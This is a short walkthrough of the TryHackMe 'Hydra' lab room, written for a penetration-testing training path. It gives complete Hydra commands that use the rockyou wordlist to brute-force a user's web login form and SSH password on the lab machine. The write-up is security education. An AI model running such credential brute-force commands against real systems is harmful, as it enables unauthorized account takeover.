This is the write up for the room Hydra on Tryhackme and it is part of the CompTIA Pentest+ Path
Make connection with VPN or use the attackbox on Tryhackme site to connect to the Tryhackme lab environment
TASKS Hydra
Task 1
Read all that is in the task. Start the attached machine
Once the machine is deployed open firefox and navigate to http://MACHINE_IP
1.1 Use Hydra to bruteforce molly’s web password. What is flag 1?
According ot the question the user name is molly and we now need to find her password with hydra
We will use the command given us in the task and adjust it a little bit
hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.200.80 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V
Now login with these credentials and you will find the flag
1.2 Use Hydra to bruteforce molly’s SSH password. What is flag 2?
I did an nmap scan to make sure the ssh port is on 22
Command I used
hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.200.80 ssh
Login in with those credentials
ssh molly@MACHINE_IP
